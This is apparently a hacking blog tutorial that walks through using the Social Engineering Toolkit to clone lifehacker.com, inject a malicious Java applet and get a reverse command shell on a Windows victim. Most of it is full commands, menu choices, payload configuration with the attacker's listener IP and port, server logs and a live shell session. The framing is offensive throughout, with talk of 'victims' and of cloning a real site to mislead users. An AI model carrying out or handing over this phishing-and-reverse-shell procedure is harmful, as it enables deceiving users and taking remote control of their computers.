In a previous post we saw how to exploit remote windows machines using metasploit java signed applet exploit and doing some social engineering on the user. In this post we shall try a similar hack using the social engineering toolkit. Social engineering toolkit (SET) is an exploitation framework for social engineering attacks like phishing etc.
Launch SET. In back track it can be found in BackTrack > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set. Or launch from the terminal
[email protected]:~# cd /pentest/exploits/set/ [email protected]:/pentest/exploits/set# ./set
The main menu would come up.
The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit
Select option #1 that is Social-Engineering Attacks to move on to the next menu.
Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) QRCode Generator Attack Vector 10) Powershell Attack Vectors 11) Third Party Modules 99) Return back to the main menu.
From this menu select option #2 Website Attack Vectors. The next menu shall list the attack methods along with their descriptions
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Victim Web Profiler 9) Create or import a CodeSigning Certificate 99) Return to Main Menu
Select the first option, Java Applet Attack Method.
1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu
Now SET asks if it should use a webpage from an existing list of templates it has, or should it clone a new website and prepare it for the attack. Select 2) Site Cloner. After this SET will ask for some information.
set:webattack>2 [-] NAT/Port Forwarding can be used in the cases where your SET machine is [-] not externally exposed and may be a different IP address than your reverse listener. set> Are you using NAT/Port Forwarding [yes|no]: no [-] Enter the IP address of your interface IP or if your using an external IP, what [-] will be used for the connection back and to house the web server (your interface address) set:webattack> IP address for the reverse connection:192.168.1.7 [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:lifehacker.com [*] Cloning the website: http://lifehacker.com [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: FL8khGiXAvaXu7 [*] Malicious java applet website prepped for deployment
First it will ask if NAT is needed. If the victim is outside your own network, that is over the internet and you are behind a router in your LAN, then NAT is needed. In our case the victim is on the same LAN so I entered no for NAT.
Next it will ask for the ip address for the reverse connection. This is the ip address that the victim machine will connect to to provide the shell. It should be the access ip of the hacker's machine or where SET is running.
Then SET asks for the url to clone. We entered lifehacker.com. It will clone and create a look alike copy of lifehacker.com and inject the java attack applet in it. Cloning and using an existing website further misleads the victim into thinking the site to be a genuine one if not original.
After all this, SET will finally ask for the payload to use.
What payload do you want to generate: Name: Description: 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Bind Shell Execute payload and create an accepting port on remote system 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter 11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET 12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support 13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP 14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe) 15) Import your own executable Specify a path for your own executable
To brief up, payload is that part of the code that will generate the final shell after the exploitation process. The most commonly used payload is reverse tcp shell. But here we are going to try a new one, the SE toolkit interactive shell, option 11.
set:payloads>11 set:payloads> PORT of the listener :443 [*] Done, moving the payload into the action. [-] Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload... [*] Stager turned off, prepping direct download payload... [*] Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack. *************************************************** Web Server Launched. Welcome to the SET Web Attack. *************************************************** [--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Opera, Chrome, and FireFox [--] [*] Moving payload into cloned website. [*] The site has been moved. SET Web Server is now listening.. [-] Launching the SET Interactive Shell... [*] Crypto.Cipher library is installed. AES will be used for socket communication. [*] All communications will leverage AES 256 and randomized cipher-key exchange. [*] The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:443
Once SET is listening, its time to open the url in the victim browser. So open the ip address of the hacker computer in the victim computer browser. It will ask to run Java and then popup a confirmation dialog.
Once the victim user clicks Run and allows the applet to run, the hacker machine would get a shell on the victim computer.
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET / HTTP/1.1" 200 - 192.168.1.2 - - [18/Apr/2013 20:59:18] code 404, message File not found 192.168.1.2 - - [18/Apr/2013 20:59:18] "GET /favicon.ico HTTP/1.1" 404 - 192.168.1.2 - - [18/Apr/2013 20:59:22] code 404, message File not found 192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar.pack.gz HTTP/1.1" 404 - 192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 - 192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 - 192.168.1.2 - - [18/Apr/2013 20:59:54] "GET /Gc4pPU HTTP/1.1" 200 - [*] Connection received from: 192.168.1.2 *** Pick the number of the shell you want *** 1: 192.168.1.2:WINDOWS
Now type 1 and hit enter
set> 1 [*] Dropping into the Social-Engineer Toolkit Interactive Shell. set:active_target>
This is the SET interactive shell. Type help and hit enter to see the available options of this SET shell. To get the native os shell, type shell and hit enter.
set:active_target>shell [*] Entering a Windows Command Prompt. Enter your commands below. set:active_target:shell>dir Volume in drive C has no label. Volume Serial Number is FC18-53D3 Directory of C:\Documents and Settings\enlightened\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.64 04/15/2013 02:46 AM <DIR> . 04/15/2013 02:46 AM <DIR> .. 04/09/2013 01:56 AM 44,521,424 chrome.dll 04/09/2013 01:07 AM 882,175 chrome_100_percent.pak 04/09/2013 01:56 AM 57,296 chrome_frame_helper.dll 04/09/2013 01:56 AM 82,896 chrome_frame_helper.exe ................
This java applet based attack is not actually an exploit, it is the same technique used for browser+java based remote desktop solution. That is, an applet is allowed to run with user privileges, thats all. However can be used by hackers to attack users who are not aware of the phishing and might click run without understanding the consequences.